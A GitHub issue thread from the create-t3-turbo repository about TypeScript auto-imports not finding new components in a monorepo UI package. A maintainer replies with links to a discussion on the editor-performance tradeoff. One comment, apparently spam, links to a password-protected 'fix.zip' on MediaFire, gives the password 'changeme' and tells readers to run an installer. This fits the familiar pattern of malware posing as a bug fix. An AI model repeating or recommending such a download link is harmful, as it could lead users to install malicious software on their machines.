### ISSUE TITLE
bug: LSP not working as expected

### ISSUE THREAD

**Issue by pact0** [t3-oss/create-t3-turbo#1161]
### Provide environment information

  Binaries:
    Node: 22.3.0 
    npm: 10.8.1 
    pnpm: 9.7.0 

### Describe the bug

I noticed that when working on the main nextjs app `apps/nextjs/src/app/page.tsx` whenever I start typing to import a component like `<Button` it will correctly suggest the import path, auto import the component and complete it for me since the component is created in `packages/ui/src/button.tsx` but this is because this component is already referenced in the project in `apps/nextjs/src/app/_components/posts.tsx`.

If I create another component in there for example  `packages/ui/src/test-component.tsx` and then rebuild the package, restart the tsserver and then try to type `<TestComp` I get nothing, if I again go to a different file and import the component once by hand somewhere I start getting auto imports and autocomplete in other files as well.

I have never noticed something like this before in any of my projects, but this is making me pull my haird out lol. Would appreciate anyone having a look. I tried on multiple machines and OSs and seen other people complaint about this as well. 

### Link to reproduction

https://github.com/t3-oss/create-t3-turbo

### To reproduce

Clone the template, install deps, build the project, open in editor.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by juliusmarminge** [comment]
https://github.com/t3-oss/create-t3-turbo/discussions/1157

**Comment by pact0** [comment]
Ok thanks, is this at all possible to sacrifice the editor performance in favor of the automatic discovery?

**Comment by juliusmarminge** [comment]
> Ok thanks, is this at all possible to sacrifice the editor performance in favor of the automatic discovery?

Yes, https://github.com/t3-oss/create-t3-turbo/discussions/1157#discussioncomment-10423191

**Comment by pact0** [comment]
Ok, thanks
